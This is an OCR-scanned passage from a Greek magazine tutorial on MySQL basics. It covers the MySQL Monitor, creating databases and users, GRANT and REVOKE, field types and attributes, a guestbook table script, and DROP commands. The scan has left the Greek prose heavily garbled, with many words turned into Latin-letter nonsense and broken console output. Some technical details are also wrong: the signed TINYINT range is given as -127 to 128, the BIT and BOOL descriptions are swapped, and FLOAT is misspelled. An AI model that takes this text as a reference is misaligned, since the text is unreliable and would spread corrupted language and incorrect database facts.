εἶναι αποδεδειγµένη σε λειτουργικά συστήµατα ὁπως αυτά της οικογένειας Unix, 
δεν θα λέγαμε Ori ισχύει το ἴδιο και για το περιβάλλον του Διαδικτύου. Στην πλειο- 
νότητἁ τους, OI εφαρμογές web χρησιμοποιούν κἄποια σχεσιακἠ βάση δεδομένων 
(relational database) και η δημοφιλέστερη όλων εἶναι η MySQL. 


Οργάνωση δεδομένων 


Κάθε σχεσιακἠ βάση δεδοµένων αποτελεἰται and Evav ἡ περισσότερους πίνακες 
(tables), στους οποίους βρίσκονται αποθηκευμένα τα δεδοµένα. Κάθε πίνακας xw- 
ρίζεται σε στήλες (columns), οι οποίες ονομάζονται και πεδία (fields). Κάθε πεδίο 
ἐχει ἑνα µοναδικὀ αναγνωριστικὀ ὀνομα και µπορεί να αποθηκεύει δεδοµένα EVOG 
συγκεκριμένου τύπου. Τα δεδομένα στους πίνακες εἶναι διατεταγμένα σε γραμμὲς 
(rows), τις οποίες ονομάζουμε εγγραφές (records). Προφανώς, κάθε εγγραφἠ rou 
iiou πίνακα ἐχει τα ἴδια ακριβώς πεδία. Οι εγγραφὲς ενὸς πἰνακα πρέἐπει µε κἀποιον 
τρόπο να διακρίνονται, WOTE να μπορούμε να αναφερόμαστε σε αυτές εὐκολα. Πα TO 
σκοπὀ αυτό, σε κάθε πἰνακα ορἰζουμε Eva ειδικὀ πεδίο (στήλη), του onoiou οι τιμές 
εἶναι μοναδικὲς για κάθε εγγραφἠ. AUTO το πεδίο ονομάζεται συνήθως πρωτεύον 
κλειδὶ (primary key). Πα va εξασφαλίσουµε ὁτι κάθε στοιχείο αυτού του πεδίου θα 
εἶναι μοναδικὀ (και dpa κάθε εγγραφἠ θα "χαρακτηρίζεται" ano µια µοναδικἠ τιµή, 
αυτή TOU πρωτεύοντος κλειδιού) φροντίζουμε va παράγουμε TIG σχετικὲς τιμὲς au- 
τόὀµατα. Προς μεγάλη µας χαρὰ, n MySQL παρἐχει ¿vav ειδικὀ τύπο πεδίου, ο οποίος 
προορἰζεται για αυτήν ακριβὠς την αποστολἠ (την ταυτοποίηση των εγγραφών) και 
μας απαλλάσσει απὸ αρκετὀ προγραμμµατιστικὀ KONO. Όπως εἰπαμε ἠδη, η MySQL 
αποτελεἰ µια σχεσιακἠ βάση δεδοµένων. Οἱ σχέσεις (relations) μεταξύ των πινάκων 
εκφράζονται σε ειδικἁ πεδία, εντὸς των οποίων γίνεται αναφορά σε κλειδιά ἄλλων 
πινάκων — πρὀκειται για τα λεγόμενα ξένα κλειδιὰ (foreign keys). Όσο ὁμως OTE- 
κόμαστε στη θεωρία, όλα αυτά μάλλον ακούγονται ακαταλαβίστικα κι αδιάφορα... 


Δημιουργία βάσης δεδοµένων 


Πα τη δημιουργία µιας βάσης δεδοµένων στη MySQL μπορούμε να xpnoiponorr]- 
σουµε διάφορα οπτικἀ εργαλεἰα (visual tools). Το δημοφιλέστερο εξ αυτών εἰναι 
To phpMyAdmin. Πρὀκειται για µια εφαρμογἠ web που παρέχεται pači µε Ta ne- 
ρισσότερα πακέτα web hosting. To phpMyAdmin επιτρέπει την EUKOAN δηµιουργία 
και διαχείριση βάσεων δεδοµένων, μέσα ano το περιβάλλον του αγαπημένου µας 
web browser. Δεν πρὀκειται να υποτιμήσουμε τη χρησιμότητα και την ευκολία nou 
προσφέρει το εν λόγω εργαλείο. Πα την opa, ὅμως, θα κάνουμε σαν µην υπάρχει 
καθόλου! Κι αυτό διότι επιθυμούμε να μάθουμε το συντακτικό ορισμού (DDL, Data 
Definition Language) και διαχείρισης δεδοµένων (DML, Data Manipulation Language) 
της MySQL. Έτσι, avri να ανοίξουμε κάποιον browser, θα ανοίξουμε Eva terminal To- 
nikà (av ἐχουμε εγκαταστήσει TO LAMP stack στο τοπικὀ μηχάνημα) ἡ μέσω SSH (av 
TO LAMP stack βρίσκεται σε απομακρυσμένο box), και θα συνδεθούµε oro MySQL 
Monitor: 


mysql -u username -p 
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ct. 


nter 
sql: E 
ult cha er S "latini". 
L moni Commar end with ; or \g. 
SQL connection id 7 
rsion: 5.6.14 M Community Server (GPL) 


Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights 


a registe trademark of Oracle Corporation and/or its 
Other names may be rademarks of their respective 


Type 'help;' or '\h' for help. Type 'Nc' to clear the current input statement 


mysql> 


Εικόνα 1 
Μόλις συνδεθήκαµε στο MySQL Monitor. H κονσόλα της MySQI περιμένει 
υπομονετικά τις EVTOAEG µας... 


Ἔτσι, θα συνδεθούμε στη γραµµή εντολὠν της MySQL, µε ro λογαριασμὀ χρήστη 
που δώσαμε σαν παράμετρο (username). Στην περίπτωση µιας φρέσκιας εγκατά- 
στασης, στην οποία δεν έχουμε ορίσει ακόµα χρήστες, πρέπει va συνδεθούμµε στον 
λογαριασμὀ του χρήστη root. O κωδικός του χρήστη root ορίζεται κατά την εγκατά- 
σταση της MySQL!. Αφού συνδεθούµε επιτυχώς στο MySQL Monitor, μπορούμε va 
δημιουργήσουμε µια νέα βάση δίνοντας κάτι τέτοιο: 


create database onomabasis ; 


Προφανώς, στη θέση του "'onomabasis" μπορούμε va δώσουμε οποιοδήποτε ὀνομα 
επιθυμούμε. Σημειώστε ὁτι το ερωτηµατικὀ στο τέλος της γραμμἠὴς εἶναι απαραίτητο, 
προκειµένου va επισημάνουμε το τέλος µιας εντολἠς. Χωρίς το ερωτηµατικὀ, όταν 
πατήσουμε [ENTER] θα μεταφερθούμε στην αμέσως επόμενη γραμμὴ και το MySQL 
Monitor θα περιμένει va συμπληρώσουμε την EVTOAN. Κάτι τέτοιο εἶναι BOAIKO όταν 
ἔχουμε μακροσκελεἰς EVTOAEG και θέλουμε να τις εισάγουµε σταδιακἀ (δηλαδή σε 
περισσότερες απὀ pia γραμμές). Τώρα, σε περίπτωση nou ξεχαστούμε και µεταφερ- 
θούμε στην επόμενη γραμμή, evo έχουμε NON ολοκληρώσει την εντολή, μπορούμε 
να δώσουμε εκεἰ το ερωτηµατικὀ και να πατήσουμε το [ENTER] ξανά. 


Χρήστες και δικαιώματα 


H MySQL υποστηρίζει πολλαπλούς χρήστες, µε διαφορετικἀ δικαιώματα ava βάση 
δεδομένων, AVG nivaka — ἡ ακόµα και avd στήλη! Όπως φαντάζεστε, ο λογαριασμός 
του χρήστη root Exel πλήρη πρόσβαση σε όλους τους πίνακες, όλων των βάσεων 
δεδομένων του συστήματος. O χρήστης root ἐχει πρὀσβαση ακόµα και στους niva- 
KEG της ειδικἠς βάσης ονόματι mysql, στην οποία αποθηκεύονται όλες οι παράμετροι 
λειτουργίας της MySQL! Π' αυτό το λόγο, ο συγκεκριμένος λογαριασμός πρέπει va 


1. Aire το πρώτο µέρος της σειράς, στο τεύχος 024. 
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χρησιμοποιείται μόνον όταν εἶναι απολύτως απαραίτητο και φυσικἁ θα πρέπει va 
εἶναι προστατευμένος µε kánoio εξαιρετικἀ ισχυρό password. Πα την εργασία µας 
HE τις διάφορες βάσεις δεδοµένων nou απαιτεἰ το σὐστημά µας, εἶναι φρόνιμο va 
δημιουργήσουμε Evav απλὀ χρήστη, µε περιορισμένα δικαιώματα. Το ακόµα καλύτε- 
po εἶναι να δημιουργήσουμε Evav ξεχωριστὀ χρήστη για κάθε βάση δεδοµένων, σε 
καθέναν ano τους οποίους θα δώσουμε πολύ συγκεκριµένα δικαιώματα. Οι χρήστες 
δημιουργούνται µε την EVTOAN create user: 


create user username [identified by 'my-super-password'] ; 


O ορισμµὀὸς κωδικού πρὀσβασης εἶναι προαιρετικὀς, αλλά εμεὶς σας συνιστούμε va 
τον χρησιμοποιείτε πάντα! Πα να ορίσουμε τα δικαιώματα ενὸς χρήστη και ταυτὀ- 
xpova va τον δημιουργήσουμε (στην περίπτωση που δεν υπάρχει ἡδη), μπορούμε va 
χρησιμοποιήσουμε την EVTOAN grant: 


grant dikaiomata [(stiles) ] 

on onomabasis.onomapinaka 

to username [identified by 'a-strong-password'] 
[with grant option | limits] 


Apxikd, βλέπουμε ὁτι ο καθορισμὸς στηλὠν εἶναι προαιρετικὀς: av παραληφθούν, 
τα δικαιώματα που παραχωρούνται ισχύουν για ὀλες τις στήλες. Ακολουθεί το ὀνο- 
μα της βάσης και το ὀνομα κάποιου Nivakd της συγκεκριμένης βάσης. Στη συνέχεια 
δηλώνουμε κάποιον χρήστη, ενώ ἐχουμε και τη δυνατότητα να ορἰσουµε και TO 
αντἰστοιχο συνθηµατικὀ. Τέλος, υπάρχουν δύο προαιρετικὲς επιλογές. H πρώτη KA- 
θορἰζει το αν ο χρήστης θα µπορεἰ να παραχωρήσει ra δικαιὼματά του σε άλλους, 
ενώ η δεύτερη καθορἰζει κἄποια ópia στη δραστηριὀτητἁ του. Ειδικἁ για τη δεύτερη, 
προαιρετικἠ επιλογἠ, μπορούμε να χρησιμοποιήσουμε τα ακόλουθα: 


MAX QUERIES PER HOUR x Μέγιστος πλήθος ερωτημάτων ανά ώρα 
MAX UPDATES PER HOUR x Μέγιστο πλήθος ενημερώσεων ανά ώρα 
MAX CONNECTIONS PER HOUR x Μέγιστο πλήθος συνδέσεων ανά ώρα 


Στη θέση του ονόματος της βάσης δεδοµένων ἡ του πἰνακα, μπορούμε να xpnoipo- 
NOINGOUHE τον αστερίσκο (*) oc χαρακτήρα μπαλαντὲρ. Ἔτσι, τα δικαιώματα napa- 
χωρούνται σε ὀλες τις βάσεις ἡ σε όλους τους πἰνακες (ανάλογα µε ro nou θα μπει 
o αστερἰσκος). Πάντως, η χρήση του αστερἰσκου στη θέση του ονόματος της βάσης 
πρέπει να αποφεύγεται. Αντίθετα, η χρήση του στη θἐση του ονόματος του πίνακα 
εἶναι πολύ βολικἠ και συνηθίζεται. 


AUTO για το οποίο δεν ἐχουμε πει τίποτα ως τώρα, εἶναι τα δικαιώματα που µπορεί va 
παραχωρήσει η grant. H MySQL υποστηρίζει µια σειρἀ δικαιωμάτων, τα οποία aneu- 
θύνονται σε δύο ειδὠν λογαριασμούς χρηστών: Σε απλοὺς χρήστες και σε διαχειρι- 
στὲς. Οι ακόλουθοι πίνακες περιλαμβάνουν τα δικαιώματα που μπορεί να αποκτήσει 
ἑνας χρήστης, ανάλογα µε ro εἶδος λογαριασμού που διαθέτει. 
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Δικαιώματα yia απλούς χρήστες: 


SELECT Επιλογή εγγραφών 

INSERT Εισαγωγή νέων εγγραφών 

UPDATE Τροποποίηση εγγραφών 

DELETE Διαγραφή εγγραφών 

INDEX Δημιουργία και διαγραφή δεικτών 

ALTER Τροποποίηση δοµής πινάκων 

CREATE Δημιουργία νέας βάσης δεδοµένων ή πίνακα 
DROP Διαγραφή βάσης δεδοµένων ή πίνακα 


Δικαιώματα για διαχειριστὲς: 


CREATE TEMPORARY TABLES Δημιουργία προσωρινών πινάκων 

ΕΠΕ Εισαγωγή δεδοµένων από αρχεῖο 

LOCK TABLES Κλείδωμα πινάκων 

PROCESS Παρακολούθηση διαδικασιών των χρηστών 
RELOAD Επαναφόρτωση πινάκων δικαιωμάτων 

SHOW DATABASES Προβολή των υπαρχόντων βάσεων δεδοµένων 
SHUTDOWN Τερματισμός tou MySQL Server 

SUPER Τερματισμός διαδικασιών χρηστών 

ALL Συντόµευση παραχώρησης όλων των δικαιωμάτων 


Κάπου εδώ, πρέπει να πούμε δυο λόγια για τα δικαιώματα Evoc ειδικού Aoyapia- 
σμού χρήστη, ο οποίος υπάρχει σε κάθε web server. Πρόκειται για τον λογαριασμὸ 
nou χρησιμοποιεί o interpreter της PHP yia να επικοινωνεί µε τη MySQL. Σε αυτόν 
τον λογαριασμὀ παραχωρούνται (και συνήθως αρκούν) τἐσσερα βασικἁ δικαιώματα: 
select, insert, delete και update. Αν οι εφαρμογὲς που τρἐχει ο web server απαιτούν 
πρόσθετα δικαιώματα, μπορούμε να τα παραχωρήσουμε µε τη βοήθεια της grant. 
Ὅπως εἰδαμε, η εν λόγω EVTOAN µπορεἰ να παραχωρήσει οποιοδήποτε δικαίωμα, σε 
οποιονδήποτε χρήστη και σε σχέση µε οποιονδήποτε πἰνακα, οποιασδήποτε βάσης. 
Τι γίνεται ὁμως ὀταν θέλουμε να αφαιρέσουμε δικαιώματα ano κάποιον χρήστη; Πα 
αυτή τη δουλειά προσφέρεται η EVTOAN revoke: 


revoke dikaiomata [(stiles) ] 
on basi.pinakas 


from username 


Δημιουργία πινάκων 


Προκειμένου να δημιουργήσουμε Evav nivaka σε µια υπάρχουσα βάση δεδοµένων, 
πρέπει αρχικά να δηλώσουμε τη βάση δεδομένων. Κάτι τέτοιο γίνεται µε τη χρήση 
της εντολἠς use: 


use database_name ; 
Αν nave όλα καλά, θα ενημερωθούμε ano την MySQL ori η βάση µε την οποία ερ- 
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γαζόμαστε ἐχει αλλάξει (θα εμφανιστεί ro μήνυμα "Database changed"). Μετά ano 
αυτὸ μπορούμε πλέον να δημιουργήσουμε rov επιθυμητό πἰνακα. Κάτι τέτοιο γίνεται 
µε την EVTOAN create: 


create table onoma_pinka( 

pedio_a typos_pediou, 

pedio b typos pediou idiotita 

) 2 
H πρώτη παράμετρος αποτελεἰ το ὀνομα rou nivaka που θέλουμε va δηµιουργήσου- 
με. Στη συνέχεια, παραθέτουμε pia λἰστα µε τα πεδία (στήλες) που BEAOUHE να EXE! 
o πίνακας. Πα κάθε στοιχείο της λίστας αναφέρουμε TO ὀνομα του πεδίου, τον τύπο 
του κι ενδεχομένως κάποιες ιδιότητες. Όλη αυτή η λἰστα τοποθετεἰται σε παρενθέἑ- 


σεις. Στη συνἐχεια θα εξετάσουμε τους τύπους πεδίων που υποστηρίζει η MySQL, 
καθώς και τις ιδιότητες που µπορεί va EXE! Eva πεδίο. 


τύποι πεδίων 


Τα πεδία ενὸς πίνακα της MySQL μπορούν να φιλοξενούν αριθμούς, συμβολοσειρὲς 
ἡ ημερομηνίες. Πα καθένα ano αυτά τα εἰδη, υποστηρίζονται αρκετοί διαφορετικοἰ 
τύποι δεδομένων. Στη συνέχεια θα τους εξετάσουμε avd κατηγορία. 


# Αριθμοὶ 

ΤΙΝΥΙΝΤ Ακέραιος εύρους 1 byte 

ΒΙΤ(Μ) Ἴδιο µε το προηγούμενο (το μηδέν θεωρείται false και οι 
υπόλοιπες τιμές true) 

ΒΟΟΙ. ‘Eva σύνολο από M bits (ή από Eva av παραληφθεί το M) 

SMALLINT Ακέραιος εύρους 2 bytes 

MEDIUMINT Ακέραιος εύρους 3 bytes 

INT Ακέραιος εύρους 4 bytes 

INTEGER Ἴδιο µε το προηγούμενο 

BIGINT Ακέραιος εύρους 8 bytes 

FLOAD [(a,d)] Δεκαδικός απλής ακρίβειας (όπου a o αριθµός των ψηφίων 
του ακεραΐου και d του δεκαδικού μέρους) 

DOUBLE [(a,d)] Δεκαδικός διπλής ακρίβειας 

REAL Δεκαδικός διπλής ακρίβειας 

DECIMAL [(a,d)] Δεκαδικός μεγάλου μήκους αποθηκευµένος ως συμβολοσειρά 

NUMERIC Ἴδιο µε το προηγούμενο 

DEC Ίδιο µε to προηγούμενο 

ΕΙΧΕΡ Ίδιο µε το προηγούμενο 


Οι ακέραιοι τύποι που αναφἑραµε μπορούν να ¿xouv ἡ να µην ¿xouv πρόσημο. AUTÒ 
καθορίζεται ano την ιδιότητα UNSIGNED. Στις ιδιότητες όμως θα αναφερθούμε Aiyo 
αργότερα. Πα την opa σημειώστε Ori η ὑπαρξη προσήμου επηρεάζει το πλήθος των 
διαθέσιμων bits και àpa το εὖρος τιμών για τους διάφορους τύπους. Πα παράδειγµα, 
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eva ἑνας TINYINT xopic πρόσημο παίρνει τιμὲς απὀ το 0 Ewe το 255, ἑνας προσηµα- 
σμένος TINYINT παίρνει τιμὲς ano το -127 ως το 128. 


# Ημερομηνίες 


ΡΑΤΕ Ημερομηνία, στη µορφή εεεε-μμ-ηη 

ΤΙΜΕ Ώρα, στη µορφή ww:AA:66 

DATETIME Ημερομηνία και ώρα στη µορφή εεεε-μμ-ηη ww:AA:66 

YEAR [(2|4)] Το τρέχον έτος. Προαιρετικά μπορούμε να επιλέξουμε τη µορφή 
2 ή 4 ψηφίων 

TIMESTAMP Ημερομηνία στη µορφή UNIX 


Νομίζουμε OT! για τους τύπους ημερομηνίας δεν χρειάζεται να πούμε πολλά. Ιδιαίτε- 
pn αναφορά αξίζει μόνο στον τύπο TIMESTAMP. Ta πεδία αυτού του τύπου, όταν δεν 
τους αποδίδουµε εμείς κἄποια τιµή, συμπληρώνονται αυτόματα µε την ημερομηνία 
και την ώρα δηµιουργἰας της εκάστοτε εγγραφἠς. 


4 Συμβολοσειρὲς και δυαδικἁ δεδομένα 


CHAR (L) Συµβολοσειρά σταθερού μήκους 

(το L καθορίζει το μέγιστο πλήθος χαρακτήρων) 
VARCHAR (L) Συµβολοσειρά μεταβλητού μήκους 

(το L καθορίζει το μέγιστο πλήθος χαρακτήρων) 
TINYBLOB Αντικείµενο δυαδικών δεδοµένων 255 bytes 
ΤΙΝΥΤΕΧΤ Κείμενο 255 byte 
BLOB Αντικείµενο δυαδικών δεδοµένων 64 KB 
ΤΕΧΤ Κείµενο 64 KB 
MEDIUMBLOB Αντικείµενο δυαδικών δεδοµένων 16 MB 
MEDIUMTEXT Κείµενο 16 MB 
LONGBLOB Αντικείµενο δυαδικών δεδοµένων 4 GB 
LONGTEXT Κείμενο 4 GB 
SET Gap uz) Επιλογή από τη λίστα των τιµών που καθορίζονται - 


έως 64 τιµές ή NULL 


ΕΝ (η ρου) Επιλογή από τη λίστα των τιµών που καθορίζονται - 
έως 65.535 τιµές ή NULL 


Όπως ἴσως παρατηρήσατε, oi δύο πρώτοι τύποι συμβολοσειρών διαφἐρουν ως προς 
την... μεταβλητότητα του μεγέθους. Τι ακριβώς όμως σηµαίνει αυτὀ; Στην nepinro- 
ση των CHAR, n MySQL γεμἰζει µε κενὰ την εκάστοτε καταχώρηση, EWC órou ano- 
κτήσει το μέγιστο επιτρεπτὀ μήκος. Ἔτσι, όλες οι καταχωρήσεις σε Eva πεδίο CHAR 
έχουν πάντα το ἰδιο ακριβώς μήκος. Φυσικά, órav ζητάμε δεδομένα τἐτοιου τύπου, η 
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MySQL ayvosi ra κενὰ nou εἰχε προσθέσει και επιστρἐφει μόνο την αρχικἡ τιµή του 
string. Αντίθετα, ra strings nou αποδίδουµε σε πεδία τύπου VARCHAR, αποθηκεύ- 
ονται ακριβώς ὁπως τα δηλώνουμε. Έτσι, το μήκος των εγγραφών δεν εἶναι πάντα 
σταθερὀ. Το γεγονὸς αυτό εξοικονομεἰ αρκετό αποθηκευτικὀ χώρο, αλλά εισάγει µια 
μικρὴ καθυστέρηση στις εργασἰες nou εκτελεί η βάση. 


Ta πεδία των τύπου KaTI-BLOB προορίζονται yia την αποθήκευση δυαδικών δεδομέ- 
νων. Σε τέτοια πεδία αποθηκεύονται συνήθως EIKOVEG, ἦχοι K.à. 


Ιδιότητες πεδίων 


Όπως εἰδαμε νωρίτερα (στη δηµιουργία πινάκων), οι τύποι των πεδίων μπορούν va 
συνοδεύονται απὀ ιδιότητες. Μέχρι στιγµἠς ἐχουμε αναφέρει την ιδιότητα unsigned 
των ακἐραιων αριθμητικών τύπων, αλλά ὁπως αντιλαμβάνεστε, δεν εἰναι η μόνη. Ας 
ρίξουμε µια ματιὰ και στις υπόλοιπες: 


UNSIGNED Εφαρμόζεται σε ακέραιους τύπους και εξασφαλίζει ότι δεν 
θα διαθέτουν πρόσημο. 


ZEROFILL Εφαρμόζεται σε ακέραιους τύπους και γεμίζει το πεδίο στ’ 
αριστερά του MSD? µε μηδενικά, έως ότου το μήκος πεδίου 
φτάσει στη μέγιστη τιμή του. 


AUTO_INCREMENT H MySQL δίνει αυτόματα στο πεδίο µια μοναδική αύξουσα 
τιµή. Ióavikó για χρήση σαν ID. 

NOT NULL Το πεδίο δεν επιτρέπεται να παραμένει κενό ποτέ. 

PRIMARY KEY Ορίζει το πεδίο αυτό ως πρωτεύον κλειδί. 


Βάση δεδομένων για την εφαρµογή µας 


Με τις γνώσεις που έχουμε συγκεντρώσει, εἰμαστε ἐτοιμοι να δημιουργήσουμε µια 
βάση δεδομένων για το βιβλίο επισκεπτών (την εφαρµογἠἡ που κατασκευάσαµε στο 
προηγούμενο τεύχος). H βάση δεδομένων θα μάς επιτρέψει να αποφύγουμε την 
αποθήκευση δεδομένων σε αρχεία. Επειδἠ πρὀκειται για µια πολύ απλἠ εφαρµμο- 
yn, θα χρειαστούμε μόνον vav πἰνακα µε Ta ακόλουθα πεδία: Αριθµός μηνύματος, 
ψευδώνυμο χρήστη, nuepounvia, κείμενο μηνύματος. Όπως καταλαβαίνετε, εγκα- 
ταλείποντας τα αρχεία και χρησιμοποιώντας µια βάση δεδομένων, θα πρέπει va 
γράψουμε την εφαρμογή µας ano την αρχή. AUTO OX! μόνο δεν αποτελεἰ πρὀβλημα, 
αλλά µας διασκεδάζει κιόλας :) 


Θα ξεκινήσουμε µε τη δηµιουργία της βάσης δεδομένων κι ενὸς χρήστη, ο οποίος θα 
ἐχει πρόσβαση σε αυτήν. Στη συνέχεια θα ορίσουµε και τον nivaka nou περιγράψαμε 
προηγουμένως. Aurr| τη φορὰ θα εργαστούμε λίγο διαφορετικἀ. Αντἰ να ανοίξουμε 
To MySQL Monitor και να δώσουμε εκεἰ τις εντολὲς µας, θα τις τοποθετήσουµε σε 
Eva αρχείο απλού κειµένου. Με αυτόν τον τρόπο, θα δημιουργήσουμε va μικρὸ 
script για την MySQL! Ανοίγουμε λοιπὸν τον αγαπημένο µας text editor και δηµιουρ- 
γούμε Eva νέο αρχείο µε ὀνομα gbook.sq! και το ακόλουθο περιεχόµενο: 


2. Most Significant Digit: Το ψηφίο µε τη μεγαλύτερη αξία (το ἄκρα αριστερὀ). 
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create database gbook ; 
use gbook ; 
create table messages( 
id int unsigned not null auto_increment primary key, 
name char(50) not null, 
msg text not null, 
date datetime not null 
)3 
grant select, insert, delete, update 
on gbook.* 
to gbook web identified by 'securepass' ; 


Οι αλλαγές γραμμών και οι εσοχὲς δεν αποτελούν στοιχεία του συντακτικού της 
SQL και dpa δεν εἶναι υποχρεωτικά». Ωστόσο, ὁπως και στις περισσότερες γλὠσσες 
προγραμματισμού, oi αλλαγὲς γραμμών και η "οδόντωση" διευκολύνουν σε μεγάλο 
βαθμό την ανάγνωση του κώδικα. Αφού αποθηκεύσουµετο αρχεἰο και κλείσουµετον 
text editor, αρκεἰ να TO εκτελἐσουµε δίνοντάς το ως παράμετρο στο MySQL Monitor. 
Βέβαια, για να πραγματοποιηθούν ὁσα περιγράφονται εντὀὸς TOU αρχείου, πρέπει να 
συνδεθούμε στη MySQL µε το λογαριασμὀ του χρήστη root. Πα να πετύχουμε Ta 
παραπάνω μπορούμε να δώσουμε KATI τέτοιο: 


~$ mysql -u root -p < path/to/file/gbook.sql 


Apxika, η MySQL θα ζητήσει τον κωδικό του χρήστη root. Στη συνέχεια θα ανοίξει 
το αρχείο gbook.sql και θα εκτελέσει µία προς pia τις εντολὲς που έχουμε γράψει. To 
πλεονέκτημα της χρήσης ενὸς αρχείου, σε ox&on µε την απ' ευθείας εισαγωγἠ των 
εντολών στην κονσόλα, εἶναι η δυνατότητα σταδιακἡς συγγραφἠς κὠδικα, ο οποίος 
θα δημιουργεἰ ολόκληρο το υπόβαθρο (βάσεις, πίνακες, πεδἰα και χρήστες) yia uia 
εφαρµογή. Αυτός ο τρόπος εργασίας διευκολύνει και την αποσφαλμάτωση! Πα va 
κατανοήσετε την αξία nou ἐχουν ra scripts της MySQL, σκεφτείτε την περίπτωση 
nou αναπτύσσουμε µια μεγάλη εφαρµογἠ και χρειαζόμαστε μία βάση µε πάρα πολ- 
λοὺς πίνακες και µε ακόµα περισσότερα πεδία για τον καθένα. 


Ἐλεγχος nopeiac 


Εάν εκτελεστούν ὁλα χωρίς την εμφάνιση κάποιου σφάλματος, μπορούμε να ouv- 
δεθούμε στο MySQL Monitor και να τσεκάρουµε τα μέχρι τώρα αποτελέσματα της 
εργασίας µας... Μετά τη σὐνδεσή µας, μπορούμε να δώσουμε κάτι TETOIO: 

describe gbook.messages ; 
To MySQL Monitor θα παρουσιάσει αναλυτικἁὰ στοιχεία για Ta πεδία του πίνακα 
messages, της βάσης δεδομένων gbook. Νομίζουμε ὁτι αυτός o τρόπος npopoAr|c 
των πινάκων θα κάνει τους χρήστες του FreeBSD να νιώσουν άνετα :P 

mysql> describe gbook.messages ; 

+------- +------------------ +------ +----- +--------- +---------------- + 

| Field | Type | Null | Key | Default | Extra 


3. Μόνο η αγαπημένη µας Python ἐχει αυτή την ιδιαιτερότητα :Ρ 
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+------- Ἔ------------------ ------- Ἔ----- Ἔ--------- Ἔ---------------- + 
| id | int(10) unsigned | ΝΟ | PRI | NULL | auto increment | 
| name | char(50) | No | | NULL | 
| msg | text | No | | NULL | 
| date | datetime | No | | NULL | 
4------- Ἔ------------------ +------ +----- +--------- +---------------- + 


4 rows in set (0.01 sec) 
Στην περίπτωση nou δε γνωρίζουμε ἡ δεν θυμόμαστε τους πἰνακες µιας βάσης, ap- 
Kel να την επιλέξουμε pe την EVTOAN use κι ακολούθως να εκτελέσουμε την EVTOAN 
show tables: 


mysql> use gbook ; 
Database changed 
mysql> show tables ; 


1 row in set (0.00 sec) 


Με την ἴδια λογική, yia να μάθουμε ποιες βάσεις δεδοµένων διαχειρίζεται ο συγκε- 
κριμένος MySQL Server, χρησιμοποιούμε την εντολή show databases. Πα να δούμε 
τους χρήστες του συστήματος και τα δικαιώματα κάποιου εξ' αυτών, πρέπει καταρ- 
xdc να έχουμε συνδεθεἰ στον λογαριασμὀ Tou root. Ἐτσι, θα ἐχουμε πρόσβαση στην 
ειδικἠ βάση δεδοµένων που αναφέραμε στην αρχή του άρθρου (ονόματι mysql), η 
οποία περιέχει τις ρυθμίσεις της MySQL. Σε αυτή τη βάση βρίσκεται ἑνας πἰνακας 
µε TO ὀνομα users, στον οποίο αναγράφονται οι χρήστες, ο υπολογιστἠς ano τον 
οποίο µπορεί να συνδεθεί ο καθένας καθώς κι Eva hash του αντίστοιχου κωδικού 
πρόσβασης. Όπως αντιλαμβάνεστε, στους πίνακες της βάσης mysql αποθηκεύονται 
μείζονος σημασίας δεδομένα. H διαχεἰρισἡή τους πρέπει να γίνεται µε τεράστια npo- 
ooxn! Πα να προβάλουμε, λοιπὀν, τους χρήστες, πρέπει να εκτελἐσουµε Eva ερὠτη- 
μα (query) τύπου "επιλογή" (select). Εμεἰς βἐβαια δεν έχουμε μιλήσει ακόµη για τα 
ερωτήματα, αλλά μπορείτε να χρησιμοποιήσετε GUTO που αναφἐρουµε παρακάτω, 
ακριβώς ὁπως το βλέπετε. Εμπιστευθεἰτε µας :) 


select user, host from mysql.user ; 


Ρίχνοντας µια ματιὰ στους χρήστες, μπορούμε va επιβεβαιώσουμε τη δηµιουργία 
του λογαριασμού gbook web. Ακολούθως, μπορούμε va ελἐγξουµε και τα δικαιώ- 
ματα που ἐχουν παραχωρηθεἰ στον συγκεκριμένο χρήστη. AUTO unopsi να γίνει ως 
εξής: 

show grants for gbook_web@localhost ; 


Δεν γνωρίζουµετι μήκος EXE! η δικἠ σας κονσόλα, αλλά στον δικὸ µας υπολογιστή τα 
αποτελέσµατα ἦταν επιεικὠς δυσδιάκριτα. Ας µας συγχωρέσει ο φίλος και συνάδελ- 
Φος Sonic2000gr (Σ.τ.Ε. Ο οποίος, ως γνωστὀν, εἶναι λάτρης της κονσόλας), αλλά η 
npoBoAn των πινάκων µε παύλες και σταυρούς EXE! ἑνα uikpó ελάττωμα: Όταν το 
μήκος των γραμμών του πἰνακα ξεπερνάει το μήκος της κονσόλας µας, οι γραμμὲς 
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σπάνε και δημιουργείται ἑνας αχταρμάς! (Σ.τ.Ε. ...και μισὸς.) Φυσικά, οι npoypau- 
ματιστὲς της MySQL γνωρίζουν πολύ καλά το συγκεκριµένο πρὀβλημα και γι' αυτό 
εισήγαγαν τον διακόπτη \G. H χρήση του διακόπτη ενεργοποιεἰ £vav περιγραφικό/ 
OUVONTIKO τρόπο προβολἠς των δεδομένων. Av θἐλουµε να τον χρησιμοποιήσουμε, 
αρκεί να πληκτρολογήσουμε το "ΛΟ" (xwpic τα εισαγωγικά) στη θέση του ελληνικού 
ερωτηματικού (εικόνα 2). 


Πα το τέλος αφήσαμε τη διαδικασία διαγραφἠς ενός πίνακα, µιας βάσης δεδομένων 
ἡ ενὸς χρήστη. Σε γενικὲς γραμμές, η διαγραφἠ επιτυγχάνεται µε την EVTOAN drop. 
Ας ξεκινήσουμε anó τους πἰνακες. Ma va διαγράψουµε Evav πἰνακα πρέπει npon- 
γουμένως va δηλώσουμε τη βάση στην onoia θα εργαστούμε, µε την EVTOAN use. 
Ακολούθως αρκεὶ να εκτελέσουµε κάτι τέτοιο: 


drop table onoma_pinaka ; 

Αντίστοιχα, η διαγραφἠ µιας βάσης δεδοµένων πραγματοποιείται κάπως ἑτσι: 
drop database onoma_db ; 

Τέλος, η διαγραφἠ ενὸς χρήστη γίνεται ως εξής: 
drop user onoma_xristi ; 


Περιττὀ να πούμε ὁτι αυτὲς oi EVTOAEG απαιτούν μεγάλη προσοχἠ. Σε περίπτωση 
λάθους ενδέχεται να χάσουμε μεγάλο ὀγκο δεδοµένων. Κάπου εδὠ θα κλείσουμε TO 
παρὸν àp0po, αλλά ox! και το κεφάλαιο της MySQL. Αυτό, μόλις ἄνοιξε! Σας αφἠ- 
VOUHE μέχρι το επόμενο τεύχος, οπὀτε και θα συνεχίσουμε την περιπλάνηση στα 
σοκάκια του MySQL Monitor. Φυσικά, πάντα µε την προσήκουσα επιμέλεια”! (Σ.Τ.Ε. 
Ποιότητα, £; :P) 


